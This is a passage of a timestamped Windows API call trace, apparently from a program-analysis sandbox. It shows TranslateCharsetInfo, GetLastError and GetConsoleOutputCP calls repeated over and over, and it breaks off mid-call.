TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.331] GetLastError () returned 0xcb [0152.331] GetConsoleOutputCP () returned 0x1b5 [0152.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.332] GetLastError () returned 0xcb [0152.332] GetConsoleOutputCP () returned 0x1b5 [0152.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.332] GetLastError () returned 0xcb [0152.332] GetConsoleOutputCP () returned 0x1b5 [0152.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.332] GetLastError () returned 0xcb [0152.332] GetConsoleOutputCP () returned 0x1b5 [0152.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.332] GetLastError () returned 0xcb [0152.332] GetConsoleOutputCP () returned 0x1b5 [0152.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.332] GetLastError () returned 0xcb [0152.332] GetConsoleOutputCP () returned 0x1b5 [0152.332] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.332] GetLastError () returned 0xcb [0152.332] GetConsoleOutputCP () returned 0x1b5 [0152.333] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.333] GetLastError () returned 0xcb [0152.333] GetConsoleOutputCP () returned 0x1b5 [0152.333] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.333] GetLastError () returned 0xcb [0152.333] GetConsoleOutputCP () returned 0x1b5 [0152.333] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.333] GetLastError () returned 0xcb [0152.333] GetConsoleOutputCP () returned 0x1b5 [0152.333] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.333] GetLastError () returned 0xcb [0152.333] GetConsoleOutputCP () returned 0x1b5 [0152.333] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.333] GetLastError () returned 0xcb [0152.333] GetConsoleOutputCP () returned 0x1b5 [0152.333] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.333] GetLastError () returned 0xcb [0152.333] GetConsoleOutputCP () returned 0x1b5 [0152.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.334] GetLastError () returned 0xcb [0152.334] GetConsoleOutputCP () returned 0x1b5 [0152.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.334] GetLastError () returned 0xcb [0152.334] GetConsoleOutputCP () returned 0x1b5 [0152.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.334] GetLastError () returned 0xcb [0152.334] GetConsoleOutputCP () returned 0x1b5 [0152.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.334] GetLastError () returned 0xcb [0152.334] GetConsoleOutputCP () returned 0x1b5 [0152.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.334] GetLastError () returned 0xcb [0152.334] GetConsoleOutputCP () returned 0x1b5 [0152.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.334] GetLastError () returned 0xcb [0152.334] GetConsoleOutputCP () returned 0x1b5 [0152.334] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.335] GetLastError () returned 0xcb [0152.335] GetConsoleOutputCP () returned 0x1b5 [0152.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.335] GetLastError () returned 0xcb [0152.335] GetConsoleOutputCP () returned 0x1b5 [0152.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.335] GetLastError () returned 0xcb [0152.335] GetConsoleOutputCP () returned 0x1b5 [0152.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.335] GetLastError () returned 0xcb [0152.335] GetConsoleOutputCP () returned 0x1b5 [0152.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.335] GetLastError () returned 0xcb [0152.335] GetConsoleOutputCP () returned 0x1b5 [0152.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.335] GetLastError () returned 0xcb [0152.335] GetConsoleOutputCP () returned 0x1b5 [0152.335] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.335] GetLastError () returned 0xcb [0152.336] GetConsoleOutputCP () returned 0x1b5 [0152.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.336] GetLastError () returned 0xcb [0152.336] GetConsoleOutputCP () returned 0x1b5 [0152.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.336] GetLastError () returned 0xcb [0152.336] GetConsoleOutputCP () returned 0x1b5 [0152.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.336] GetLastError () returned 0xcb [0152.336] GetConsoleOutputCP () returned 0x1b5 [0152.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.336] GetLastError () returned 0xcb [0152.336] GetConsoleOutputCP () returned 0x1b5 [0152.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.336] GetLastError () returned 0xcb [0152.336] GetConsoleOutputCP () returned 0x1b5 [0152.336] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.336] GetLastError () returned 0xcb [0152.336] GetConsoleOutputCP () returned 0x1b5 [0152.337] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.337] GetLastError () returned 0xcb [0152.337] GetConsoleOutputCP () returned 0x1b5 [0152.337] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.337] GetLastError () returned 0xcb [0152.337] GetConsoleOutputCP () returned 0x1b5 [0152.337] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.337] GetLastError () returned 0xcb [0152.337] GetConsoleOutputCP () returned 0x1b5 [0152.337] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.337] GetLastError () returned 0xcb [0152.337] GetConsoleOutputCP () returned 0x1b5 [0152.337] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.337] GetLastError () returned 0xcb [0152.337] GetConsoleOutputCP () returned 0x1b5 [0152.337] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.337] GetLastError () returned 0xcb [0152.337] GetConsoleOutputCP () returned 0x1b5 [0152.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.338] GetLastError () returned 0xcb [0152.338] GetConsoleOutputCP () returned 0x1b5 [0152.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.338] GetLastError () returned 0xcb [0152.338] GetConsoleOutputCP () returned 0x1b5 [0152.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.338] GetLastError () returned 0xcb [0152.338] GetConsoleOutputCP () returned 0x1b5 [0152.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.338] GetLastError () returned 0xcb [0152.338] GetConsoleOutputCP () returned 0x1b5 [0152.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.338] GetLastError () returned 0xcb [0152.338] GetConsoleOutputCP () returned 0x1b5 [0152.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.338] GetLastError () returned 0xcb [0152.338] GetConsoleOutputCP () returned 0x1b5 [0152.338] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.339] GetLastError () returned 0xcb [0152.339] GetConsoleOutputCP () returned 0x1b5 [0152.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.339] GetLastError () returned 0xcb [0152.339] GetConsoleOutputCP () returned 0x1b5 [0152.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.339] GetLastError () returned 0xcb [0152.339] GetConsoleOutputCP () returned 0x1b5 [0152.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.339] GetLastError () returned 0xcb [0152.339] GetConsoleOutputCP () returned 0x1b5 [0152.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.339] GetLastError () returned 0xcb [0152.339] GetConsoleOutputCP () returned 0x1b5 [0152.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.339] GetLastError () returned 0xcb [0152.339] GetConsoleOutputCP () returned 0x1b5 [0152.339] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.339] GetLastError () returned 0xcb [0152.339] GetConsoleOutputCP () returned 0x1b5 [0152.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.340] GetLastError () returned 0xcb [0152.340] GetConsoleOutputCP () returned 0x1b5 [0152.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.340] GetLastError () returned 0xcb [0152.340] GetConsoleOutputCP () returned 0x1b5 [0152.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.340] GetLastError () returned 0xcb [0152.340] GetConsoleOutputCP () returned 0x1b5 [0152.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.340] GetLastError () returned 0xcb [0152.340] GetConsoleOutputCP () returned 0x1b5 [0152.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.340] GetLastError () returned 0xcb [0152.340] GetConsoleOutputCP () returned 0x1b5 [0152.340] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.340] GetLastError () returned 0xcb [0152.340] GetConsoleOutputCP () returned 0x1b5 [0152.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.341] GetLastError () returned 0xcb [0152.341] GetConsoleOutputCP () returned 0x1b5 [0152.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.341] GetLastError () returned 0xcb [0152.341] GetConsoleOutputCP () returned 0x1b5 [0152.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.341] GetLastError () returned 0xcb [0152.341] GetConsoleOutputCP () returned 0x1b5 [0152.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.341] GetLastError () returned 0xcb [0152.341] GetConsoleOutputCP () returned 0x1b5 [0152.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.341] GetLastError () returned 0xcb [0152.341] GetConsoleOutputCP () returned 0x1b5 [0152.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.341] GetLastError () returned 0xcb [0152.341] GetConsoleOutputCP () returned 0x1b5 [0152.341] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.342] GetLastError () returned 0xcb [0152.342] GetConsoleOutputCP () returned 0x1b5 [0152.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.342] GetLastError () returned 0xcb [0152.342] GetConsoleOutputCP () returned 0x1b5 [0152.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.342] GetLastError () returned 0xcb [0152.342] GetConsoleOutputCP () returned 0x1b5 [0152.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.342] GetLastError () returned 0xcb [0152.342] GetConsoleOutputCP () returned 0x1b5 [0152.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.342] GetLastError () returned 0xcb [0152.342] GetConsoleOutputCP () returned 0x1b5 [0152.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.342] GetLastError () returned 0xcb [0152.342] GetConsoleOutputCP () returned 0x1b5 [0152.342] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.342] GetLastError () returned 0xcb [0152.343] GetConsoleOutputCP () returned 0x1b5 [0152.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.343] GetLastError () returned 0xcb [0152.343] GetConsoleOutputCP () returned 0x1b5 [0152.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.343] GetLastError () returned 0xcb [0152.343] GetConsoleOutputCP () returned 0x1b5 [0152.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.343] GetLastError () returned 0xcb [0152.343] GetConsoleOutputCP () returned 0x1b5 [0152.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.343] GetLastError () returned 0xcb [0152.343] GetConsoleOutputCP () returned 0x1b5 [0152.343] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.343] GetLastError () returned 0xcb [0152.343] GetConsoleOutputCP () returned 0x1b5 [0152.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.345] GetLastError () returned 0xcb [0152.345] GetConsoleOutputCP () returned 0x1b5 [0152.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.345] GetLastError () returned 0xcb [0152.345] GetConsoleOutputCP () returned 0x1b5 [0152.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.345] GetLastError () returned 0xcb [0152.345] GetConsoleOutputCP () returned 0x1b5 [0152.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.345] GetLastError () returned 0xcb [0152.345] GetConsoleOutputCP () returned 0x1b5 [0152.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.345] GetLastError () returned 0xcb [0152.345] GetConsoleOutputCP () returned 0x1b5 [0152.345] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.345] GetLastError () returned 0xcb [0152.345] GetConsoleOutputCP () returned 0x1b5 [0152.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.346] GetLastError () returned 0xcb [0152.346] GetConsoleOutputCP () returned 0x1b5 [0152.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.346] GetLastError () returned 0xcb [0152.346] GetConsoleOutputCP () returned 0x1b5 [0152.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.346] GetLastError () returned 0xcb [0152.346] GetConsoleOutputCP () returned 0x1b5 [0152.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.346] GetLastError () returned 0xcb [0152.346] GetConsoleOutputCP () returned 0x1b5 [0152.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.346] GetLastError () returned 0xcb [0152.346] GetConsoleOutputCP () returned 0x1b5 [0152.346] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.346] GetLastError () returned 0xcb [0152.346] GetConsoleOutputCP () returned 0x1b5 [0152.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.347] GetLastError () returned 0xcb [0152.347] GetConsoleOutputCP () returned 0x1b5 [0152.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.347] GetLastError () returned 0xcb [0152.347] GetConsoleOutputCP () returned 0x1b5 [0152.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.347] GetLastError () returned 0xcb [0152.347] GetConsoleOutputCP () returned 0x1b5 [0152.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.347] GetLastError () returned 0xcb [0152.347] GetConsoleOutputCP () returned 0x1b5 [0152.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.347] GetLastError () returned 0xcb [0152.347] GetConsoleOutputCP () returned 0x1b5 [0152.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.347] GetLastError () returned 0xcb [0152.347] GetConsoleOutputCP () returned 0x1b5 [0152.347] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.347] GetLastError () returned 0xcb [0152.348] GetConsoleOutputCP () returned 0x1b5 [0152.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.348] GetLastError () returned 0xcb [0152.348] GetConsoleOutputCP () returned 0x1b5 [0152.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.348] GetLastError () returned 0xcb [0152.348] GetConsoleOutputCP () returned 0x1b5 [0152.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.348] GetLastError () returned 0xcb [0152.348] GetConsoleOutputCP () returned 0x1b5 [0152.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.348] GetLastError () returned 0xcb [0152.348] GetConsoleOutputCP () returned 0x1b5 [0152.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.348] GetLastError () returned 0xcb [0152.348] GetConsoleOutputCP () returned 0x1b5 [0152.348] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.348] GetLastError () returned 0xcb [0152.348] GetConsoleOutputCP () returned 0x1b5 [0152.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.349] GetLastError () returned 0xcb [0152.349] GetConsoleOutputCP () returned 0x1b5 [0152.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.349] GetLastError () returned 0xcb [0152.349] GetConsoleOutputCP () returned 0x1b5 [0152.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.349] GetLastError () returned 0xcb [0152.349] GetConsoleOutputCP () returned 0x1b5 [0152.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.349] GetLastError () returned 0xcb [0152.349] GetConsoleOutputCP () returned 0x1b5 [0152.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.349] GetLastError () returned 0xcb [0152.349] GetConsoleOutputCP () returned 0x1b5 [0152.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.349] GetLastError () returned 0xcb [0152.349] GetConsoleOutputCP () returned 0x1b5 [0152.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.350] GetLastError () returned 0xcb [0152.350] GetConsoleOutputCP () returned 0x1b5 [0152.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.350] GetLastError () returned 0xcb [0152.350] GetConsoleOutputCP () returned 0x1b5 [0152.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.350] GetLastError () returned 0xcb [0152.350] GetConsoleOutputCP () returned 0x1b5 [0152.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.350] GetLastError () returned 0xcb [0152.350] GetConsoleOutputCP () returned 0x1b5 [0152.350] TranslateCharsetInfo (in: lpSrc=0x1b5, 